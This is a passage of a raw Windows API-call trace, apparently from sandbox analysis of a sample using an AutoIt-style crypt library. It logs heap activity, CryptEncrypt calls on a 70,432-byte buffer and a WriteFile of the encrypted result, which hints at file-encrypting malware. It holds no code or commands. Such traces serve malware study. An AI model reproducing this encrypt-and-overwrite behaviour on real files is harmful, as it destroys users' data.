0x2e55108 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0267.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.731] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0267.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.731] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.732] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0267.732] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0267.732] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.732] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.733] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.733] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.733] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0267.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0267.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0267.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.734] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.734] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0267.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0267.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0267.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51d30 [0267.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.739] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x11319, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x11320) returned 1 [0267.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0267.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0267.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0267.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.739] CharLowerBuffW (in: lpsz="byte[70432]", cchLength=0xb | out: lpsz="byte[70432]") returned 0xb [0267.739] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.741] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.742] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.742] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.742] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe50048*, pdwDataLen=0x8cef60*=0x11319, dwBufLen=0x11320 | out: pbData=0xe50048*, pdwDataLen=0x8cef60*=0x11320) returned 1 [0267.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.745] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.745] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.746] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.746] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.746] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.746] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.746] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.746] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0267.746] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.746] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.746] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.756] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0x11320, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0x11320, lpOverlapped=0x0) returned 1 [0267.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0267.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0267.759] HeapFree (in: 